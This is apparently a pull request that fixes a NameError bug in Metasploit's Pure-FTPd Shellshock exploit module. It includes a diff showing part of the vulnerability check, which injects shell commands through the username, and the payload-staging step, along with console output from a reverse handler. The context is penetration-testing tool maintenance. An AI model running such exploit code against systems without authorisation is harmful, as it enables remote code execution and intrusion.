### PR TITLE
Fix #4019, NameError peer in pureftpd shellshock exploit

### DIFF
--- a/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb
+++ b/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb
@@ -75,11 +75,12 @@ class Metasploit4 < Msf::Exploit::Remote
     random_id = (rand(100) + 1)
     command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
     if send_command(username, command) =~ /^2\d\d ok./i
-      return CheckCode::Safe if banner !~ /pure-ftpd/i
       disconnect
+      return CheckCode::Safe if banner !~ /pure-ftpd/i
 
       command = "echo auth_ok:0; echo end"
       if send_command(username, command) =~ /^5\d\d login authentication failed/i
+        disconnect
         return CheckCode::Vulnerable
       end
     end
@@ -98,7 +99,7 @@ class Metasploit4 < Msf::Exploit::Remote
     # Cannot use generic/shell_reverse_tcp inside an elf
     # Checking before proceeds
     if generate_payload_exe.blank?
-      fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
+      fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Failed to store payload inside executable, please select a native payload")
     end
 
     execute_cmdstager(linemax: 500)


### PR DESCRIPTION
This fixes issue #4019 by changing `#{peer}`, which is not defined to `#{rhost}:#{rport}`.

This also explicitly disconnects in the check method to clean up.

Before:

```
msf-git (S:0 J:0) exploit(pureftpd_bash_env_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.112:4444 
[-] Exploit failed: NameError undefined local variable or method `peer' for #<Msf::Modules::Mod6578706c6f69742f6d756c74692f6674702f70757265667470645f626173685f656e765f65786563::Metasploit4:0x0000000e7c4008>

[*] Exploit completed, but no session was created.
msf-git (S:0 J:0) exploit(pureftpd_bash_env_exec) 
```

After:

```
msf-git (S:0 J:0) exploit(pureftpd_bash_env_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.112:4444 
[-] Exploit failed [bad-config]: 192.168.1.110:21 - Failed to store payload inside executable, please select a native payload
[*] Exploit completed, but no session was created.
msf-git (S:0 J:0) exploit(pureftpd_bash_env_exec) >
```
